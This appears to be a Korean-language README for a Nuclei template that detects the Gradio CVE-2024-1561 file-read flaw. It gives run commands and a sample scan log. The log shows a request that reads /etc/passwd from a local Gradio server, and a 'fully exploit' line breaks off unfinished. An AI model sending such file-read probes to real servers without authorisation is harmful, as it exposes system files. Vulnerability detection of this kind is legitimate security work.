
Nuclei 템플릿
이 Nuclei 템플릿은 웹 애플리케이션에서 Gradio CVE-2024-1561 취약점을 탐지하도록 설계되었습니다. Gradio는 머신러닝 모델을 위한 사용자 정의 가능한 UI 구성 요소를 생성하는 Python 라이브러리입니다. 이 취약점은 공격자가 서버에서 파일을 읽을 수 있도록 허용할 수 있습니다.
이 저장소를 로컬 머신에 클론하고 -t 플래그를 사용하여 실행하십시오:
git clone https://github.com/DiabloHTB/Nuclei-Template-CVE-2024-1561
cd Nuclei-Template-CVE-2024-1561
nuclei -target <URL> -t CVE-2024-1561.yaml
예시:
┌──(gradio-env)─(diablo㉿diablo)-[~/gradio]
└─$ nuclei -target http://127.0.0.1:7860 -t CVE-2024-1561.yaml
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.2.6
projectdiscovery.io
[INF] Current nuclei version: v3.2.6 (outdated)
[INF] Current nuclei-templates version: v9.8.6 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 65
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2024-1561] [http] [high] http://127.0.0.1:7860/file=/tmp/gradio/83bbb89b677a9cca3d271a392fa1aa2a10853c32/passwd
이 템플릿은 /etc/passwd 파일의 존재 여부를 root 사용자와 일치하는지 확인합니다.
대상을 완전히 익스플로잇하려면 다음을 확인하십시오:
면책조항 이 템플릿은 교육 및 정보 제공 목적으로만 제공됩니다. 사전 상호 동의 없이 이 템플릿을 사용하여 대상을 공격하는 것은 불법입니다. 모든 해당 지역, 주 및 연방 법률을 준수하는 것은 최종 사용자의 책임입니다. 개발자는 어떠한 책임도 지지 않으며 이 템플릿으로 인한 오용이나 손해에 대해 책임을 지지 않습니다.